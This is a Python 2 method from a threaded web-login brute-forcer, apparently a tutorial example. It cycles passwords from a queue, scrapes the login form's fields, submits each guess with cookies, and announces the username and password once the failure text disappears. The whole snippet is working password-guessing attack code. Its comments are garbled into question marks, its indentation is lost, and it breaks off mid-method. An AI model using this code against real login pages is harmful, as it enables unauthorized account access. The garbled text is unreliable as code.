def web_bruter(self):
while not self.password_q.empty() and not self.found:
#??????
brute=self.password_q.get().rstrip()
#??cookie
jar=cookielib.FileCookieJar("cookies")
#???????????cookie?jar
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
#??????
response=opener.open(target_url)
page=response.read()
print 'Trying: %s : %s (%d left)'%(self.username,brute,self.password_q.qsize())
#????????????
parser=BruterParser()
parser.feed(page)
#??????
post_tags=parser.tag_results
#??????
post_tags[username_field]=self.username
post_tags[password_field]=brute
#?????post??
login_data=urllib.urlencode(post_tags)
#?????????cookie????
login_response=opener.open(target_post,login_data)
#????
login_result=login_response.read()
#???????????????????
if failed_check not in login_result:
self.found=True
print '[*] Bruteforce successful'
print '[*] Username: %s'%username
print '[*] Password: %s'%brute
print '[*] Waiting for other threads to exit...'
#??????input????
评论列表
文章目录
